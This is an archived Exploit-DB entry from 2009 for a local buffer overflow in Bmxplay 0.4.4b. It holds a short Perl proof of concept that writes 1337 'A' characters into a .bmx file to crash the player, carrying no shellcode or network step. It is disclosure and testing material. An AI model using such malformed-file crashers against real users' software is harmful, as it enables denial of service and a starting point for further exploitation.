Lucene search

K
exploitdbSirGodEDB-ID:8607
HistoryMay 04, 2009 - 12:00 a.m.

Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)

2009-05-0400:00:00
SirGod
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

#####################################################################################################
#                    Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
#               Downlaod : http://www.brothersoft.com/bmxplay-download-235557.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

# milw0rm.com [2009-05-04]

AI Score

7.4

Confidence

Low

Related for EDB-ID:8607